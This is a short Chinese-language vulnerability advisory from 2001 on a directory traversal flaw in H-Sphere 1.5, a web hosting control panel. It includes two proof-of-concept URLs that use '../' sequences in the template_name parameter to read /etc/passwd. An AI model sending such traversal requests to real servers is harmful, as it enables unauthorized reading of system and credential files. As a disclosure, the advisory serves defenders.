H-Sphere存在任意文件可查看漏洞发布时间:2001-09-27 更新时间:2001-09-27 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Positive Software H-Sphere 1.5详细描述 H-Sphere 提供跨多个服务器对WEB HOSTING自动操作,是一个运行在多系统下的商业产品,支持APACHE和IIS。 其中没有对某些请求中的'../'进行很好的过滤,可以导致恶意用户提交恶意请求而获得WEB ROOT目录以外的文件内容。 测试代码 http://www.target.com/some-path/psoft.hsphere.CP/some-path/?template_name=../../../../../../../../../../../../etc/passwd http://www.target.com/shiva/psoft.hsphere.CP/admin/2628_0/?template_name=../../../../../../../../../../../../etc/passwd 解决方案 尚无 相关信息 Crazy Einstein <crazy_einstein@yahoo.com>. |